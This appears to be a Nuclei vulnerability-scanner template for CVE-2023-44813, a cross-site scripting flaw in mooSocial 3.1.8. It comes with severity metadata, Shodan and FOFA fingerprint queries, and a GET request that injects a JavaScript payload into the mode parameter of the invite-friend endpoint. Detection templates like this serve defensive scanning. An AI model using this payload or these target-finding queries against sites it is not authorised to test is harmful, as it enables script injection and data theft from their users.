2024-05-15 05:29:46 +00:00
id : CVE-2023-44813
info :
name : mooSocial v.3.1.8 - Cross-Site Scripting
author : ritikchaddha
severity : medium
description : |
Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.
impact : |
Successful exploitation could lead to unauthorized access or data theft
remediation : |
Upgrade to a patched version of mooSocial
reference :
- https://github.com/ahrixia/CVE-2023-44813
- https://nvd.nist.gov/vuln/detail/CVE-2023-44813
2024-05-31 19:23:20 +00:00
- https://github.com/nomi-sec/PoC-in-GitHub
2024-05-15 05:29:46 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-44813
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.01077
epss-percentile : 0.84242
2024-05-15 05:29:46 +00:00
cpe : cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : moosocial
product : moosocial
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:702863115
- http.favicon.hash:"702863115"
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash="702863115"
2024-05-15 05:29:46 +00:00
tags : cve,cve2023,moosocial,xss
http :
- method : GET
path :
2024-05-15 06:42:04 +00:00
- "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"
2024-05-15 05:29:46 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2024-05-15 06:42:04 +00:00
- "initInviteFriendBtn('model');alert(document.domain)//;"
2024-05-15 05:29:46 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502201cdf99ca13ad865d44f6f19a8bf72b8b90211fd7771f01947c1559cfdeeb3b22022100a652cd0d4992c880a8e81df6e3e701e2d42e4d16f61058ece78137c5d3ebab6e:922c64590222798bb761d5b6d8e72950
